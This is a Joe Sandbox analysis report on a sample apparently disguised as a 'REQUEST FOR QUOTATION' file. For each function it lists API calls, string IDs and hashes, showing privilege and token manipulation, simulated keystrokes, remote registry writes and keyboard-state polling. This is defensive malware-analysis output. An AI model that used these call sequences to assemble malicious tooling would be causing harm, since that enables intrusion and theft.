                                                                                                                                                                                                                              • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                                                                                                                                                                                              • API String ID: 1357608183-1426331590
                                                                                                                                                                                                                              • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                                                                                                                                                              • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                                                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                                                                                                                                                                                              • IsIconic.USER32(?), ref: 0043D66E
                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0043D685
                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                                                                                                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                                                                                                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0043D721
                                                                                                                                                                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                                                                              • API String ID: 4125248594-2988720461
                                                                                                                                                                                                                              • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                                                                                                                                                              • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                                                                                                                                                                • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                                                                                                • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00458353
                                                                                                                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004583B6
                                                                                                                                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                                                                                                                                                                                              • GetProcessWindowStation.USER32 ref: 004583E6
                                                                                                                                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                                                                                                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                                                                                                                                                                                                • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                                                                                                                                                                • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                                                                              • String ID: $default$winsta0
                                                                                                                                                                                                                              • API String ID: 2063423040-1027155976
                                                                                                                                                                                                                              • Opcode ID: 6388ce5f88c963af8a849a756f99d6c3c13203fa5580aefd9d0f359e2798b7ca
                                                                                                                                                                                                                              • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6388ce5f88c963af8a849a756f99d6c3c13203fa5580aefd9d0f359e2798b7ca
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 0046C890
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 0046C8D3
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 0046C927
                                                                                                                                                                                                                                • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 0046C975
                                                                                                                                                                                                                                • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                                                                                                                                                                                                • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 0046C9C4
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 0046CA13
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 0046CA62
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                              • API String ID: 3953360268-2428617273
                                                                                                                                                                                                                              • Opcode ID: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
                                                                                                                                                                                                                              • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0046EFB6
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0046EFCB
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0046EFE2
                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0046F031
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0046F074
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0046F08B
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                              • API String ID: 1803514871-438819550
                                                                                                                                                                                                                              • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                                                                                                                                                              • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                              • API String ID: 536824911-966354055
                                                                                                                                                                                                                              • Opcode ID: 3505478b3485744cc1070ec7f7eb5efd5be3945e855373bd555d4648a7c47e02
                                                                                                                                                                                                                              • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3505478b3485744cc1070ec7f7eb5efd5be3945e855373bd555d4648a7c47e02
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                                                                                                                                                                                              • API String ID: 0-559809668
                                                                                                                                                                                                                              • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                                                                                                                                                              • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0046F113
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0046F128
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0046F13F
                                                                                                                                                                                                                                • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0046F179
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0046F1BC
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0046F1D3
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                              • API String ID: 1824444939-438819550
                                                                                                                                                                                                                              • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                                                                                                                                                              • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 0046A231
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 0046A2B2
                                                                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 0046A2EE
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                                                                                                                              • API String ID: 2733774712-3457252023
                                                                                                                                                                                                                              • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                                                                                                                                                              • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00460097
                                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00460102
                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 00460139
                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 00460179
                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 004601B3
                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 004601EA
                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00460221
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
